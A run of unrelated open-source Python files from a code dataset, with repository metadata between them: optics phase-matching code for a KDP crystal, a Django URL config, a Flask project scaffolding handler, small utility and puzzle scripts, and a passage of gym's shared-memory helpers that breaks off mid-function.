        all_phasematch_results = [self.phasematching(pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, type, verbose) for type in types]
        for phasematch_result in all_phasematch_results:
            if phasematch_result[0] is not None: # there is phase matching condition
                print('phase matching condition: {}({}) = {}({}) + {}({})'.format(phasematch_result[1], phasematch_result[3], phasematch_result[4], phasematch_result[6], phasematch_result[7], phasematch_result[9]))
                print('refractive indexes: pump {:.3f}, signal {:.3f}, idler {:.3f}'.format(phasematch_result[2], phasematch_result[5], phasematch_result[8]))
                print('phase matching angle (theta): {:.2f} deg'.format(phasematch_result[0]))
                print('='*30)
        return all_phasematch_results
def sellmier_equation(A, B, C, D, wl_unit = 1):
    """Factory for a two-pole Sellmeier dispersion relation.

    Returns ``n(wavelength, temperature)`` computing
    ``sqrt(1 + A*w^2/(w^2 - B) + C*w^2/(w^2 - D))`` with
    ``w = wavelength * wl_unit``.  The temperature argument is accepted for
    interface uniformity with other index functions but is unused here.
    """
    def refractive_index(wavelength, temperature):
        w_sq = (wavelength * wl_unit) ** 2
        return np.sqrt(1 + A * w_sq / (w_sq - B) + C * w_sq / (w_sq - D))
    return refractive_index
def modified_sellmier_equation(A, B, C, D, E, wl_unit = 1):
    """Factory for the modified Sellmeier dispersion form of
    K. W. Kirby and L. G. DeShazer,
    "Refractive indices of 14 nonlinear crystals isomorphic to KH2PO4,"
    J. Opt. Soc. Am. B 4, 1072-1078 (1987):

        n = sqrt(A + B*C/(C*w^2 - 1) + D*w^2/(E*w^2 - 1)),  w = wavelength*wl_unit

    The temperature argument is accepted but unused.
    """
    def refractive_index(wavelength, temperature):
        w_sq = (wavelength * wl_unit) ** 2
        return np.sqrt(A + (B * C / (C * w_sq - 1)) + (D * w_sq / (E * w_sq - 1)))
    return refractive_index
############################
########## TESTS ###########
############################
# test using KDP data
def KDP_test():
    """Smoke test: build a KDP crystal and print its qmix phase-matching table."""
    # dispersion relations from refractiveindex.info (wavelength given in nm)
    def KDP_n_o(wavelength_nm, temperature):
        wl_um = wavelength_nm * 1.0e-3
        return np.sqrt(2.259276 + (13.00522*wl_um**2/(wl_um**2 - 400) + 0.01008956/(wl_um**2 - 0.0129426)))
    def KDP_n_e(wavelength_nm, temperature):
        wl_um = wavelength_nm * 1.0e-3
        return np.sqrt(2.132668 + (3.2279924*wl_um**2/(wl_um**2 - 400) + 0.008637494/(wl_um**2 - 0.0122810)))
    # Alternative coefficient sets (K. W. Kirby and L. G. DeShazer,
    # "Refractive indices of 14 nonlinear crystals isomorphic to KH2PO4,"
    # J. Opt. Soc. Am. B 4, 1072-1078 (1987)):
    # KDP_n_o = modified_sellmier_equation(2.257574, 1.0115308e-10, 7.0637619e9, 30.43721e5, 17.27179e5, 1.0e-7)
    # KDP_n_e = modified_sellmier_equation(2.129495, 0.96503229e-10, 72.513618e9, 5.924875e5, 7.870713e5, 1.0e-7)
    # KDP_n_o = sellmier_equation(1.256618, 0.84478168e-10, 33.89909e5, 1.113904, 1.0e-7)
    # KDP_n_e = sellmier_equation(1.131091, 0.8145980e-10, 5.75675e5, 0.8117537, 1.0e-7)
    # crystal description consumed by genericCrystal; defaultdict(float) makes
    # unspecified numeric parameters read as 0.0
    KDP_data = collections.defaultdict(float, {
        'name': 'KDP',
        'temperature': 273.15 + 33,  # kelvin
        'length': 10,  # mm
        'enable_catching': False,
        'n_o': KDP_n_o,
        'n_e': KDP_n_e,
        'n2': 0,
        'theta': 0,
        'deff': 2.65e-13  # m/V
    })
    KDP_crystal = genericCrystal(KDP_data)
    KDP_crystal.qmix(0, 1053, 1053, False)

if __name__ == '__main__':
    KDP_test()
| [
"pinkaew@stanford.edu"
] | pinkaew@stanford.edu |
680c21cf0706bd61c182757516285b0c3d931fc4 | 081641354e1a685fc3bb504383bd85b09b47fede | /Pub/urls.py | 1296cdcd8db62fccb0aa9fb5d3bf1f5530b0b7b5 | [] | no_license | nitnelavsT/PeakPoke | e0771afbdbee191a2f224e24531eee38d9e956d3 | 816c655f9b91e6cfd54b694607b417e56d9d34d6 | refs/heads/main | 2023-04-23T17:54:52.342793 | 2021-04-13T17:08:21 | 2021-04-13T17:08:21 | 348,394,175 | 1 | 2 | null | 2021-04-08T16:21:25 | 2021-03-16T15:14:33 | Python | UTF-8 | Python | false | false | 286 | py | from django.conf import settings
from django.conf.urls import url
from django.contrib import admin
from django.urls import include, path
from . import views
urlpatterns = [
    path('', views.PubView, name="Pub"),  # pub index / list view
    path('<Pub_id>', views.PubDetail, name="DetailPub"),  # detail page; untyped converter captures Pub_id as a string
] | [
"noreply@github.com"
] | nitnelavsT.noreply@github.com |
6ac225ca6bffd67999e217a1294f2c3b91f43186 | f200553bc6c5222d2bc7de5bd62835c30af3e5ed | /flask_sketch/handlers/api_framework_handler.py | f733056fff62a3323147362fe522314a66fa7c85 | [
"MIT"
] | permissive | ericsouza/flask-sketch | 6a69f3dd143ea30d4e4c72402decb546e1836bbc | 65625a567e5492b3787c5da3ba5e12b1473783c4 | refs/heads/master | 2023-03-27T05:36:23.030008 | 2021-03-17T00:57:22 | 2021-03-17T00:57:22 | 281,234,890 | 11 | 2 | MIT | 2021-03-30T01:32:50 | 2020-07-20T22:03:49 | Python | UTF-8 | Python | false | false | 4,578 | py | import os
from os.path import join as pjoin
from flask_sketch import templates
from flask_sketch.sketch import Sketch
from flask_sketch.const import requirements as reqs
from flask_sketch.utils import GenericHandler
def restx_handler(sketch: Sketch):
    """Scaffold Flask-RESTX support when ``sketch.api_framework == "restx"``.

    Adds the flask-restx requirement, creates the api/resources/examples
    package, writes the API ``__init__`` template (auth-aware), an example
    Pet resource, and the matching example model (Mongo or SQL flavor).
    Returns True when it handled the sketch, otherwise falls through
    (implicitly returning None so the next handler can run).
    """
    if sketch.api_framework == "restx":
        sketch.add_requirements(reqs.FLASK_RESTX)
        os.makedirs(pjoin(sketch.app_folder, "api", "resources", "examples"))
        # create an empty __init__.py so the examples directory is a package
        open(
            pjoin(
                sketch.app_folder,
                "api",
                "resources",
                "examples",
                "__init__.py",
            ),
            "a",
        ).close()
        if sketch.api_auth_framework == "jwt_extended":
            sketch.write_template(
                "api_init_restx_jwtext_tpl",
                templates.api,
                pjoin(sketch.app_folder, "api", "__init__.py"),
            )
        else:
            sketch.write_template(
                "api_init_restx_noauth_tpl",
                templates.api,
                pjoin(sketch.app_folder, "api", "__init__.py"),
            )
        # pick the example resource variant: auth-protected unless auth is "none"
        if sketch.api_auth_framework == "none":
            resource_tpl = "api_examples_restx_pet_tpl"
        else:
            resource_tpl = "api_examples_restx_pet_auth_tpl"
        sketch.write_template(
            resource_tpl,
            templates.api.resources.examples,
            pjoin(sketch.app_folder, "api", "resources", "examples", "pet.py"),
        )
        # example model flavor follows the selected database backend
        if sketch.database == "mongodb":
            example_tpl_model = "pet_mongo_tpl"
        else:
            example_tpl_model = "pet_sql_tpl"
        sketch.write_template(
            example_tpl_model,
            templates.models.examples,
            pjoin(sketch.app_folder, "models", "examples", "pet.py"),
        )
        return True
def smorest_handler(sketch: Sketch):
    """Scaffold Flask-Smorest support when ``sketch.api_framework == "smorest"``.

    Adds the flask-smorest requirement, fills in the OpenAPI settings
    (spec path, Redoc and Swagger-UI locations), registers the "api"
    extension, and writes the API package, extension module, example Pet
    resource, and matching example model.  Returns True when handled;
    otherwise falls through (implicitly returning None).
    """
    if sketch.api_framework == "smorest":
        sketch.add_requirements(reqs.FLASK_SMOREST)
        # flask-smorest OpenAPI configuration, stored in the default settings profile
        sketch.settings["default"]["API_TITLE"] = sketch.project_name
        sketch.settings["default"]["API_VERSION"] = "v1"
        sketch.settings["default"]["OPENAPI_VERSION"] = "3.0.2"
        sketch.settings["default"]["OPENAPI_JSON_PATH"] = "api-spec.json"
        sketch.settings["default"]["OPENAPI_URL_PREFIX"] = "/openapi"
        sketch.settings["default"]["OPENAPI_REDOC_PATH"] = "/redoc"
        sketch.settings["default"][
            "OPENAPI_REDOC_URL"
        ] = "https://cdn.jsdelivr.net/npm/redoc@next/bundles/redoc.standalone.js"  # noqa
        sketch.settings["default"]["OPENAPI_SWAGGER_UI_PATH"] = "/swagger-ui"
        sketch.settings["default"][
            "OPENAPI_SWAGGER_UI_URL"
        ] = "https://cdn.jsdelivr.net/npm/swagger-ui-dist/"
        sketch.add_extensions("api")
        os.makedirs(pjoin(sketch.app_folder, "api", "resources", "examples"))
        # create an empty __init__.py so the examples directory is a package
        open(
            pjoin(
                sketch.app_folder,
                "api",
                "resources",
                "examples",
                "__init__.py",
            ),
            "a",
        ).close()
        if sketch.api_auth_framework == "jwt_extended":
            sketch.write_template(
                "api_init_jwt_extended_tpl",
                templates.api,
                pjoin(sketch.app_folder, "api", "__init__.py"),
            )
        sketch.write_template(
            "ext_api_smorest_tpl",
            templates.ext,
            pjoin(sketch.app_folder, "ext", "api.py"),
        )
        # pick the example resource variant: auth-protected unless auth is "none"
        if sketch.api_auth_framework == "none":
            resource_tpl = "api_example_smorest_pet_tpl"
        else:
            resource_tpl = "api_example_smorest_pet_auth_tpl"
        sketch.write_template(
            resource_tpl,
            templates.api.resources.examples,
            pjoin(sketch.app_folder, "api", "resources", "examples", "pet.py"),
        )
        # example model flavor follows the selected database backend
        if sketch.database == "mongodb":
            example_tpl_model = "pet_mongo_tpl"
        else:
            example_tpl_model = "pet_sql_tpl"
        sketch.write_template(
            example_tpl_model,
            templates.models.examples,
            pjoin(sketch.app_folder, "models", "examples", "pet.py"),
        )
        return True
def restful_handler(sketch: Sketch):
    """Placeholder for Flask-RESTful: claims the step but scaffolds nothing yet."""
    if sketch.api_framework != "restful":
        return None
    return True
def none_handler(sketch: Sketch):
    """Terminal handler: accepts sketches that want no API framework at all."""
    if sketch.api_framework != "none":
        return None
    return True
class ApiFrameworkHandler(GenericHandler):
    # No extra behavior; GenericHandler presumably invokes each handler passed
    # to the constructor until one returns True — confirm in flask_sketch.utils.
    ...
# Module-level dispatcher covering every supported api_framework value,
# including the "none" fallback.
api_framework_handler = ApiFrameworkHandler(
    restx_handler, smorest_handler, restful_handler, none_handler,
)
| [
"ericsouza0801@gmail.com"
] | ericsouza0801@gmail.com |
148e209d46c7be46d45fb222ec36e6fd80c00963 | 1514d33d13c03b2802b07f4df553d6b6085d9e05 | /Objects_and_Selections/list_colors.py | ac2bc2f4c708685f6fe7df9c8cb99c72c33cfd97 | [] | no_license | inchoate/Pymol-script-repo | 8eeab25ffc1c912454edac86ce3363b7a97dc8b9 | c31b8ba45bf36880b3bbac12bc5037151bb5d187 | refs/heads/master | 2021-01-16T07:09:10.847023 | 2011-04-06T07:17:28 | 2011-04-06T07:17:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | #
# This is how to do it from the PyMOL command line or .pml script:
#
iterate all, print color
#! /usr/bin/python
#
# and this in a Python script
#
import pymol
pymol.color_list = []
cmd.iterate('all', 'pymol.color_list.append(color)')
print pymol.color_list
| [
"jlec@j-schmitz.net"
] | jlec@j-schmitz.net |
fbf516fe4394792fc23ef89eabd0e7246aecf87f | 4bbac84a15fd45bbd5639588c6fd137b993e1700 | /urlshortener.py | e0f1328f7159d1a851b1cbb1a7bde0eb42182ca9 | [] | no_license | omini25/Python-Projects | 5fe87394f3eac874840a8021c3e24408ff5863ff | 9733a0b519fd1d3f12888b2f2d5d67a6952e5d04 | refs/heads/master | 2023-03-24T21:43:13.859673 | 2021-03-24T09:49:22 | 2021-03-24T09:49:22 | 351,025,785 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | import pyshorteners
# Prompt the user for a URL and print its TinyURL-shortened form.
long_url = input('Enter url to be shortened: ')
tiny = pyshorteners.Shortener().tinyurl.short(long_url)
print(tiny)
"david.igiebor@yahoo.com"
] | david.igiebor@yahoo.com |
c25921b5bb4731635cf3d1b7bd4d68d97291f809 | 38fa16204c98f3b76d7b50f091c4be37d0a701b4 | /practise/008/userinfo.py | dba81c40f8e713f13ee66850a1abaf036e3c40e5 | [] | no_license | wangyouyan/Python | 989ca5be89d63ea729350628ed1236c95d17b38a | 164221a6e5c1216b310ec5bfbdeb5a314fdf07ea | refs/heads/master | 2020-04-05T23:19:27.849083 | 2017-02-10T12:12:56 | 2017-02-10T12:12:56 | 46,403,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author:Rain Wang
#E-mail:wyyservice@gmail.com
def get_user():
    """Fetch via the shared SqlHelper and return the literal '1' (Python 2 code)."""
    #obj = SqlHelper()
    obj = SqlHelper.instance()  # .instance() — presumably a singleton accessor (note the commented-out direct constructor)
    obj.fetch()
    print id(obj)  # debug: show the helper object's identity to demonstrate sharing
    return '1'
def del_user():
    """Remove via the shared SqlHelper and return the literal '1' (Python 2 code)."""
    #obj = SqlHelper()
    obj = SqlHelper.instance()  # same presumed singleton accessor as get_user
    obj.remove()
    return '1'
"wyyservice@gmail.com"
] | wyyservice@gmail.com |
f692582b38415ba143f8127110a30effb73043cf | 4b3b541280aecc745cc566d1f23ffdaf89ecbf7e | /day11-1.py | b14f2329995e593a25d2998c0ae105ff6db99b40 | [] | no_license | BenSchomp/adventofcode2018 | f075320f51d16baaf3426c5fe8f2d57be851a089 | bacd1f83460adbe3965c972791f096f8887fcc50 | refs/heads/master | 2020-04-09T06:07:23.310349 | 2018-12-12T06:40:59 | 2018-12-12T06:40:59 | 160,099,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 703 | py | serialNumber = 8868
def getCellScore( x, y, serial=None ):
  """Power level of the fuel cell at (x, y) — AoC 2018 day 11 rules.

  serial defaults to the module-level serialNumber; passing it explicitly
  generalizes the function to any grid serial number (backward compatible).
  """
  if serial is None:
    serial = serialNumber
  rackId = x + 10
  powerLevel = (rackId * y + serial) * rackId
  # keep only the hundreds digit of the power level, then shift by -5
  return (powerLevel // 100) % 10 - 5

def getSquareScore( x, y, serial=None ):
  """Total power of the 3x3 square whose top-left cell is (x, y)."""
  return sum(getCellScore(x + i, y + j, serial)
             for i in range(3) for j in range(3))
scores = {}
# Brute-force every 3x3 square's total power.
# NOTE(review): range(1, 297) stops the top-left corner at 296; on a 300x300
# grid corners 297 and 298 are never scored — confirm the intended bounds.
for y in range(1, 297):
  for x in range(1, 297):
    squareScore = getSquareScore( x, y )
    scores[x,y] = squareScore
# sort coordinates by their square score; the last element is the maximum
results = sorted(scores, key=scores.get)
result = results.pop()
print( 'x,y:', result )
print( 'largest power level:', getSquareScore( result[0], result[1] ) )
| [
"ben@benschomp.com"
] | ben@benschomp.com |
931ff4decea9ba0390f54c1e38fc3db017d63a1b | aecc2b15fe59e9678ff480487d04155ee8b1723c | /Lesson5/6.py | 3ff0180cdc2eedc744742ada8941bacecada1a8a | [] | no_license | oLONIo/python | 4ba9038c1c1cfd9220aa0ae8176b860fa264f55e | 1d23b026727c9270a016a26366eafe333671a3b4 | refs/heads/main | 2023-08-12T07:24:41.413488 | 2021-09-27T21:40:09 | 2021-09-27T21:40:09 | 402,148,179 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | dict = {}
# Sum the numeric tokens on each line of test6.txt, keyed by the line's first
# token with its trailing character (e.g. a colon) stripped.
# Fixed: the result previously lived in a variable named 'dict', shadowing the
# builtin; it now uses its own name and leaves the builtin untouched.
totals = {}
with open('test6.txt', 'r', encoding='utf-8') as source:
    for line in source:
        tokens = line.replace('(', ' ').split()
        totals[tokens[0][:-1]] = sum(int(tok) for tok in tokens if tok.isdigit())
print(totals)
"zomby2005@gmail.com"
] | zomby2005@gmail.com |
9dccf3fce678428834b1b6d44b3078a9f3d10912 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /qNQkYzY8GpiFMmndh_15.py | 04665608d5fe8d6044d89c6b6ab5a3f91fff7fbe | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,242 | py | """
Write a function that connects each previous word to the next word by the
shared letters. Return the resulting string (removing **duplicate characters**
in the overlap) and the **minimum** number of shared letters across all pairs
of strings.
### Examples
join(["oven", "envier", "erase", "serious"]) ➞ ["ovenvieraserious", 2]
join(["move", "over", "very"]) ➞ ["movery", 3]
join(["to", "ops", "psy", "syllable"]) ➞ ["topsyllable", 1]
# "to" and "ops" share "o" (1)
# "ops" and "psy" share "ps" (2)
# "psy" and "syllable" share "sy" (2)
# the minimum overlap is 1
join(["aaa", "bbb", "ccc", "ddd"]) ➞ ["aaabbbcccddd", 0]
### Notes
More specifically, look at the overlap between the previous words **ending
letters** and the next word's **beginning letters**.
"""
def join(lst):
    """Chain the words in *lst* by their largest suffix/prefix overlap.

    Returns [joined_string, min_overlap] where min_overlap is the smallest
    overlap length seen across consecutive pairs (0 for a single word).

    Cleaned up: removed the redundant second assignment to the accumulator
    and replaced the 10**9 sentinel with an explicit None.
    """
    out = lst[0]
    min_overlap = None  # None until the first pair has been examined
    for prev, nxt in zip(lst, lst[1:]):
        # largest j+1 such that prev's last j+1 chars equal nxt's first j+1
        overlap = 0
        for j in range(min(len(prev), len(nxt))):
            if prev[len(prev) - 1 - j:] == nxt[:j + 1]:
                overlap = j + 1
        if min_overlap is None or overlap < min_overlap:
            min_overlap = overlap
        out += nxt[overlap:]
    return [out, min_overlap if min_overlap is not None else 0]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
eb89e1fda1e5910212522c3fc8577fa1876daf61 | 69b3fad3677f6747e8f9a61fd0f1d4b76dda1a39 | /setup.py | fb3e9eef276fafa53412e4d6afe00a487870e47c | [
"MIT"
] | permissive | xlash/utilities | 095afe9628aa976a6466111f45a75ce9c2ee2155 | 5be5b3389b9185bc2a7c33c73d582bd4da03f9dd | refs/heads/master | 2021-11-26T04:23:31.244729 | 2021-11-20T20:32:12 | 2021-11-20T20:32:12 | 76,275,287 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | from setuptools import find_packages, setup
from utilities import __version__
# Package metadata and build configuration for the 'utilities' library.
setup(
    name='utilities',
    version=__version__,  # single-sourced from the utilities package
    license='BSD',
    author='GNM',
    author_email='solutiondb@gmail.com',
    description='Utils lib for utils methods',
    url='https://github.com/xlash/utils',
    install_requires=['curtsies', 'decorator', 'python-dateutil', 'pyyaml', 'multiprocessing_logging'],
    packages=find_packages(),
)
| [
"guillaume.nourry.marquis@gmail.com"
] | guillaume.nourry.marquis@gmail.com |
148becdb0e76e3891732d79b23892af820fa597a | a7bca6f23b047860b1f00f1e49a9cdaf30a1325c | /src/fiwtools/utils/io.py | 8f7f754d2df1811072b09f4fbfd095a12289286f | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | visionjo/FIW_KRT | ad0a14bf7433bdee461562dfea5e0f4068e0d4ba | bc07ba242ccaf762a55c80204d7da05d55847ec5 | refs/heads/master | 2022-10-03T05:27:32.698912 | 2019-09-11T19:13:00 | 2019-09-11T19:13:00 | 103,139,927 | 28 | 8 | MIT | 2022-09-19T19:14:09 | 2017-09-11T13:33:54 | Python | UTF-8 | Python | false | false | 6,500 | py | from __future__ import print_function
import io
import os
import string
import warnings as warn
import scipy.io as scio
import numpy as np
from .common import is_numpy
def csv_list(imdir):
    """Paths (imdir-joined) of every CSV entry found in *imdir*."""
    entries = os.listdir(imdir)
    return [os.path.join(imdir, entry) for entry in entries if is_csv(entry)]
def dir_list(indir):
    """Absolute paths of the non-hidden subdirectories of *indir*."""
    result = []
    for entry in os.listdir(indir):
        full = os.path.join(indir, entry)
        if os.path.isdir(full) and not is_hidden_file(entry):
            result.append(os.path.abspath(full))
    return result
def file_base(filename):
    """Return 'c' for filename '/a/b/c.ext' (basename without extension)."""
    tail = os.path.split(filename)[1]
    return os.path.splitext(tail)[0]
def file_ext(filename):
    """Return the extension of *filename*, e.g. '.ext' for '/a/b/c.ext'.

    Double extensions of the form 'a.b.c' yield '.b.c' (e.g. '.tar.gz').
    Returns None when the basename contains no '.' at all.

    Fixed: the original called string.rsplit(...), a Python 2 idiom that
    raises AttributeError under Python 3; str.rsplit is used instead, and
    the bare except is no longer needed.
    """
    tail = os.path.split(filename)[1]
    parts = tail.rsplit('.', 2)
    if len(parts) == 3:
        return '.%s.%s' % (parts[1], parts[2])  # e.g. '.tar.gz'
    if len(parts) == 2:
        return '.' + parts[1]
    return None  # no extension found
def parent_dir(filename):
    """Return '/a/b' for filename '/a/b/c.ext'."""
    return os.path.split(filename)[0]
def pklist(imdir):
    """Paths (imdir-joined) of every pickle archive in *imdir*."""
    full_paths = (os.path.join(imdir, entry) for entry in os.listdir(imdir))
    return [p for p in full_paths if is_pickle(p)]
def file_tail(filename):
    """Return 'c.ext' for filename '/a/b/c.ext' (the basename)."""
    return os.path.split(filename)[1]
def is_img(path):
    """True when *path* carries a known image extension (case-insensitive)."""
    ext = os.path.splitext(path)[1].lower()
    return ext in ('.jpg', '.jpeg', '.png', '.tif', '.tiff', '.pgm', '.ppm', '.gif', '.bmp')
def is_pickle(filename):
    """True when *filename* is an existing file with a .pk/.pkl extension."""
    if not (is_file(filename) and os.path.exists(filename)):
        return False
    return file_ext(filename).lower() in ['.pk', '.pkl']
def is_text_file(path):
    """True for a .txt path whose stem does not begin with a period."""
    stem, ext = os.path.splitext(path)
    return ext.lower() == '.txt' and stem[0] != '.'
def is_video(path):
    """True when *path* carries a known video extension
    ['.avi', '.mp4', '.mov', '.wmv', '.mpg'] (case-insensitive).

    Fixed: the list contained 'mpg' without a leading dot, which could
    never match a real extension returned by os.path.splitext.
    """
    ext = os.path.splitext(path)[1].lower()
    return ext in ('.avi', '.mp4', '.mov', '.wmv', '.mpg')
def is_csv(path):
    """True when *path* carries a .csv extension (case-insensitive)."""
    ext = os.path.splitext(path)[1]
    return ext.lower() in ['.csv', '.CSV']
def is_file(path):
    """Thin wrapper around os.path.isfile; coerces *path* to str first."""
    candidate = str(path)
    return os.path.isfile(candidate)
def is_dir(path):
    """Thin wrapper around os.path.isdir."""
    result = os.path.isdir(path)
    return result
def is_hidden_file(filename):
    """True when *filename* begins with a '.' (Unix hidden-file convention)."""
    first_char = filename[0]
    return first_char == '.'
def load_mat(matfile):
    """Load a MATLAB .mat file and return its variables as a dict (scipy.io.loadmat)."""
    return scio.loadmat(matfile)
def readcsv(infile, separator=','):
    """Read a delimited text file into a list of lists of stripped cells."""
    with open(infile, 'r') as f:
        return [[cell.strip() for cell in line.split(separator)]
                for line in f.readlines()]
def readlist(infile):
    """Return the file's lines (newlines preserved) as a list."""
    with open(infile, 'r') as f:
        return list(f)
def read_mat(txtfile, delimiter=' '):
    """Whitespace-separated values define columns, lines define rows.
    Return a numpy array of float32 rows.

    Fixed: the file was opened in binary mode, so row.split(delimiter)
    mixed bytes with a str delimiter and raised TypeError on Python 3;
    the file is now read as text.
    """
    with open(txtfile, 'r') as f:
        M = [np.float32(row.split(delimiter)) for row in f]
    return np.array(M)
def readtxt(ifile):
    """Read a text file and return its lines with surrounding whitespace stripped."""
    with open(ifile, 'r') as f:
        stripped = [line.strip() for line in f.readlines()]
    return stripped
def sys_home():
    """
    :return: Home directory (platform agnostic), with a trailing directory separator.

    Fixed: the original appended os.path.pathsep, the PATH-list separator
    (':' / ';'); os.sep is the character that belongs after a directory name.
    """
    return os.path.expanduser("~") + os.sep
def mkdir(output):
    """
    Make directory (including parents) if it does not already exist.
    :param output: path of the directory to create.
    :return: True if 'output' was created; False if it already existed.
    """
    if os.path.exists(output):
        return False
    os.makedirs(output)
    return True
def filepath(filename):
    """Return '/a/b' for filename '/a/b/c.ext'."""
    head, _ = os.path.split(filename)
    return head
def newpath(filename, newdir):
    """Return newdir/c.ext for filename '/a/b/c.ext' (re-root the basename)."""
    tail = os.path.split(filename)[1]
    return os.path.join(newdir, tail)
def videolist(videodir):
    """Absolute paths of the non-hidden video files found in *videodir*."""
    result = []
    for entry in os.listdir(videodir):
        if is_video(entry) and not is_hidden_file(entry):
            result.append(os.path.abspath(os.path.join(videodir, entry)))
    return result
def writecsv(list_of_tuples, outfile, mode='w', separator=','):
    """Write a list of tuples to *outfile*, one tuple per row, fields joined
    by *separator*. Numpy arrays are converted via .tolist() first.
    Returns the output path."""
    rows = list_of_tuples.tolist() if is_numpy(list_of_tuples) else list_of_tuples
    with open(outfile, mode) as f:
        for row in rows:
            f.write(separator.join(str(v) for v in row) + '\n')
    return outfile
def writelist(mylist, outfile, mode='w'):
    """Write each element of *mylist* to *outfile* on its own line; return the path."""
    with open(outfile, mode) as f:
        f.writelines(str(item) + '\n' for item in mylist)
    return (outfile)
def txtlist(imdir):
    """Paths (imdir-joined) of the non-hidden *.txt entries in *imdir*.

    Fixed: the predicates were mistakenly called on the stdlib ``io`` module
    (io.is_text_file / io.is_hidden_file), which raised AttributeError at
    runtime; the module-local helpers are used instead.
    """
    return [os.path.join(imdir, item) for item in os.listdir(imdir)
            if is_text_file(item) and not is_hidden_file(item)]
def check_paths(*paths):
    """
    Check a variable number of file paths; warn about each missing one.
    :param paths: unordered args, each pointing to a file.
    :return: True when every path is an existing file (vacuously True for
             no args); False as soon as any path is missing.
    """
    all_found = True
    for idx, path in enumerate(paths):
        if os.path.isfile(path):
            continue
        warn.warn(str(idx) + ") File not found: " + path)
        all_found = False
    return all_found
"robinson.jo@husky.neu.edu"
] | robinson.jo@husky.neu.edu |
0cf0e7bca8f20419ea4d9ea8e7f0ef30f50527ee | 9c5e09b4f048a13961c0f4a1370a7bf01a421d92 | /gym/vector/utils/shared_memory.py | b9437814da8b9effa7bf5d1ba032e233e777c442 | [
"MIT"
] | permissive | StanfordVL/Gym | daa8c780f5ace3e33c3bf0f7109f40a0a820d59e | 5e14d19e57d8ba318b97a5edda0ab2ea591dea08 | refs/heads/master | 2023-02-03T02:44:40.185713 | 2020-12-17T14:10:16 | 2020-12-17T14:10:16 | 280,579,514 | 9 | 4 | null | null | null | null | UTF-8 | Python | false | false | 5,667 | py | import numpy as np
import multiprocessing as mp
from ctypes import c_bool
from collections import OrderedDict
from ... import logger
from ...spaces import Tuple, Dict
from .spaces import _BaseGymSpaces
__all__ = [
'create_shared_memory',
'read_from_shared_memory',
'write_to_shared_memory'
]
def create_shared_memory(space, n=1, ctx=mp):
    """Allocate shared memory for *n* observations drawn from *space*.

    Flat gym spaces get a raw ``ctx.Array``; Tuple/Dict spaces get a
    tuple/OrderedDict of recursively allocated buffers.  Raises
    NotImplementedError for unsupported space types.
    """
    if isinstance(space, Dict):
        return create_dict_shared_memory(space, n=n, ctx=ctx)
    if isinstance(space, Tuple):
        return create_tuple_shared_memory(space, n=n, ctx=ctx)
    if isinstance(space, _BaseGymSpaces):
        return create_base_shared_memory(space, n=n, ctx=ctx)
    raise NotImplementedError()
def create_base_shared_memory(space, n=1, ctx=mp):
    """Flat ctypes array of n * prod(space.shape) slots, typed from space.dtype."""
    typecode = space.dtype.char
    if typecode == '?':  # multiprocessing has no '?' typecode; use ctypes c_bool
        typecode = c_bool
    total = n * int(np.prod(space.shape))
    return ctx.Array(typecode, total)
def create_tuple_shared_memory(space, n=1, ctx=mp):
    """One shared buffer per subspace of a Tuple space."""
    buffers = [create_shared_memory(sub, n=n, ctx=ctx) for sub in space.spaces]
    return tuple(buffers)
def create_dict_shared_memory(space, n=1, ctx=mp):
    """OrderedDict of shared buffers, keyed like the Dict space's subspaces."""
    return OrderedDict((key, create_shared_memory(sub, n=n, ctx=ctx))
                       for key, sub in space.spaces.items())
def read_from_shared_memory(shared_memory, space, n=1):
    """View *shared_memory* as a batch of *n* observations for *space*.

    Returns a (possibly nested) numpy structure that ALIASES the shared
    buffer: writes to either side are visible in the other.  Use
    ``np.copy`` to detach.  Raises NotImplementedError for unsupported
    space types.
    """
    if isinstance(space, Dict):
        return read_dict_from_shared_memory(shared_memory, space, n=n)
    if isinstance(space, Tuple):
        return read_tuple_from_shared_memory(shared_memory, space, n=n)
    if isinstance(space, _BaseGymSpaces):
        return read_base_from_shared_memory(shared_memory, space, n=n)
    raise NotImplementedError()
def read_base_from_shared_memory(shared_memory, space, n=1):
    """Zero-copy numpy view of the flat buffer, shaped (n, *space.shape)."""
    flat = np.frombuffer(shared_memory.get_obj(), dtype=space.dtype)
    return flat.reshape((n,) + space.shape)
def read_tuple_from_shared_memory(shared_memory, space, n=1):
    """Tuple of per-subspace views, paired positionally with the buffers."""
    return tuple(read_from_shared_memory(mem, sub, n=n)
                 for mem, sub in zip(shared_memory, space.spaces))
def read_dict_from_shared_memory(shared_memory, space, n=1):
    """OrderedDict of per-key views, keyed like the Dict space."""
    items = [(key, read_from_shared_memory(shared_memory[key], sub, n=n))
             for key, sub in space.spaces.items()]
    return OrderedDict(items)
def write_to_shared_memory(index, value, shared_memory, space):
    """Write one environment's observation *value* into slot *index*.

    *index* must lie in [0, num_envs).  Dispatch mirrors the create/read
    helpers; raises NotImplementedError for unsupported space types.
    Returns None.
    """
    if isinstance(space, Dict):
        write_dict_to_shared_memory(index, value, shared_memory, space)
    elif isinstance(space, Tuple):
        write_tuple_to_shared_memory(index, value, shared_memory, space)
    elif isinstance(space, _BaseGymSpaces):
        write_base_to_shared_memory(index, value, shared_memory, space)
    else:
        raise NotImplementedError()
def write_base_to_shared_memory(index, value, shared_memory, space):
    """Copy *value* (flattened, cast to space.dtype) into slot *index* of the buffer."""
    size = int(np.prod(space.shape))
    flat_view = np.frombuffer(shared_memory.get_obj(), dtype=space.dtype)
    payload = np.asarray(value, dtype=space.dtype).flatten()
